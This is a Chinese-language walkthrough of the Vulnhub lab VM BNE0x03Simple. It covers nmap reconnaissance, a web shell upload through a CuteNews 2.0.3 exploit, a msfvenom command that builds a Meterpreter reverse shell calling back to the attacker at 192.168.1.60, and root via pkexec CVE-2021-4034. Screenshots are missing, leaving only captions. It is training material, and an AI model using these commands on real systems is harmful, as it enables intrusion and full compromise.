BNE0x03Simple

信息收集

# nmap -sn 192.168.1.0/24 -oN live.nmap     
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-27 10:35 CST
Nmap scan report for 192.168.1.1
Host is up (0.00019s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.1.2
Host is up (0.00042s latency).
MAC Address: 00:50:56:FE:B1:6F (VMware)
Nmap scan report for 192.168.1.77
Host is up (0.00026s latency).
MAC Address: 00:0C:29:13:41:0E (VMware)
Nmap scan report for 192.168.1.254
Host is up (0.00040s latency).
MAC Address: 00:50:56:FE:D2:25 (VMware)
Nmap scan report for 192.168.1.60
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 1.96 seconds

探测到存活主机为192.168.1.77,探测开放的端口信息:

# nmap -sT --min-rate 10000 -p- 192.168.1.77 -oN port.nmap
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-27 10:36 CST
Nmap scan report for 192.168.1.77
Host is up (0.00062s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 00:0C:29:13:41:0E (VMware)

Nmap done: 1 IP address (1 host up) scanned in 2.69 seconds

仅仅开放了80端口~

# nmap -sT -sC -sV -O -p80 192.168.1.77 -oN details.nmap
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-27 10:37 CST
Nmap scan report for 192.168.1.77
Host is up (0.00047s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Please Login / CuteNews
MAC Address: 00:0C:29:13:41:0E (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.17 seconds

Apache 2.4.7 运行在Ubuntu系统上 首页的标题是Please Login!

渗透测试

只开放了80端口,那就只能是在80端口上寻找突破点了:

BNE0x03Simple_第1张图片

首页暴露出来了两个信息,首先就是登录、注册等功能点,可以尝试sql注入;其次就是使用已知的框架“CuteNews v2.0.3”,可以通过搜索已知框架漏洞进行利用~

BNE0x03Simple_第2张图片

尝试了闭合,发现登陆不成功;没有继续测试,看看“CuteNews v2.0.3“是否存在相关漏洞~

BNE0x03Simple_第3张图片

已知漏洞搜索得到文件上传漏洞~ 下载下来看看详细信息:

searchsploit -m 37474

BNE0x03Simple_第4张图片

exp里面告诉我们:

  1. 先注册一个新的用户
  2. 登录
  3. 去个人资料
  4. 上传图片 后抓包改php

BNE0x03Simple_第5张图片

点击register之后,创建一个新的账号之后,便来到了上面的界面~ 然后按照步骤来到”Personal options“!

BNE0x03Simple_第6张图片

这里上传文件,后改文件名 !

BNE0x03Simple_第7张图片

上传成功之后,尝试访问/uploads目录,便会发现我们上传的文件!

BNE0x03Simple_第8张图片

尝试访问:

BNE0x03Simple_第9张图片

执行成功~ 连接蚁剑,准备上传msf木马等~

BNE0x03Simple_第10张图片

连接成功~ 上传msf的木马吧:

BNE0x03Simple_第11张图片

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.60 LPORT=4444 -f elf -o shel1.elf

BNE0x03Simple_第12张图片

给予执行权限!

BNE0x03Simple_第13张图片

起msf进行监听,然后执行木马:

BNE0x03Simple_第14张图片

刚开始的LHOST地址写错了,重新生成了一下,执行成功上线!

提权

查看/etc/passwd文件,发现一个可用的用户:

BNE0x03Simple_第15张图片

bull用户~ 不知道网站目录下面的相关配置文件中是否存在该用户的信息,或者数据库配置文件是否存在:

BNE0x03Simple_第16张图片

不需要mysql数据库来存储新闻、评论、用户的资料等任何的数据~

利用find命令查找suid权限的文件:

find / -perm -u=s -type f 2>/dev/null

BNE0x03Simple_第17张图片

发现pkexec,尝试利用pkexec本地提权(CVE-2021-4034)进行提权:

pkexec本地提权(CVE-2021-4034)ubuntu18_pkexec提权-CSDN博客

BNE0x03Simple_第18张图片

编译完成后,执行:

BNE0x03Simple_第19张图片

BNE0x03Simple_第20张图片

你可能感兴趣的:(Vulnhub,网络安全,web安全,安全威胁分析,安全,学习)